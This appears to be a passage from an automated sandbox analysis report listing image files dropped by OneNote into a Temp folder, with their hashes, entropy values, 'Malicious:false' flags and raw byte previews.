                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):827
                                                                                                                                                                                                                  Entropy (8bit):7.23139555596658
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                                                                                                                                  MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                                                                                                                                  SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                                                                                                                                  SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                                                                                                                                  SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A454EED3-9BBF-4E48-9864-3FFB68D17AD4}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 814x45, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1717
                                                                                                                                                                                                                  Entropy (8bit):7.154087739587035
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMzO6BOfqH/dAIWpdAIWpdAIWpdAIWUtr/SD:/hzJgfqHaPYPYPYPUt/i
                                                                                                                                                                                                                  MD5:943371B39CA847674998535110462220
                                                                                                                                                                                                                  SHA1:5CA79B7BD7E0E93271463FAEF3280F1644CBA073
                                                                                                                                                                                                                  SHA-256:9C552717E8D5079BBB226948641FF13532DF3D7BE434C6CE545F1692FA57D45A
                                                                                                                                                                                                                  SHA-512:812541836C8B6F356A4D530E5CCF1CFDCC4CA54AF048CAC19FE86707CE5EA0F41D73C501821AC627AD330291EF58C040DFC017923A7886CEEC308048DA2CE7C9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......-...."........................................&.....................U.....1T..S.R.Q.................................................R....Q.a............?..d.. ...............................................+A...Z+E...V+E...U..R.....}........Q..Ah....Ah..b.AX..b.PZ+A...V+E...V..J*....Q...b.Q..Ah....Ah..b.Ah..b.PZ*.(.@z.?.`;2.......................................................Q...b.Q..EZ*.(..Z>.G.....`Z+E......J*....F+D...F+E.......b.Q...h....PZ+E...V+E......J*....F+D...F+E..............[u#...a-...f<.9^[...l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m..0.....l0..H..6.Kn.t...&..3a...GG...[u#..8.y6.q..%.R:8....6a.+.3..a-....l0..H..9^M..f..m..3a...GM.q..m..6.Kn.tq..%.R:l.W.lg...[u#...a-...f.r..c8.....f..m.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A4CF784A-809C-44BF-A58C-2BD5D7E6C9D3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):140755
                                                                                                                                                                                                                  Entropy (8bit):7.9013245181576695
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                                                                                                  MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                                                                                                  SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                                                                                                  SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                                                                                                  SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A683D8E1-458E-449E-A20C-E592F965D1BA}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A780A0BC-29E1-4DE7-8FA9-E30F511B1696}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A799A2C0-9CD3-48E5-B2AB-E83018796CA3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A7E48278-EF90-46F4-AE1F-51588C7A8797}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AA980875-ED38-4692-8267-FA0A01CBB004}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AAB27656-6733-4731-8628-F30EE3592807}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AB75D318-733F-473D-8296-6DB1021473D3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3361
                                                                                                                                                                                                                  Entropy (8bit):7.619405839796034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                                                                                                  MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                                                                                                  SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                                                                                                  SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                                                                                                  SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{ABA25D20-F7A7-4359-9E56-9D5F59AA4901}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AC239DF7-1965-4667-8331-01645F0D8076}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):68633
                                                                                                                                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{AC7844EF-E209-4028-8D71-12844B2CA80B}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39010
                                                                                                                                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
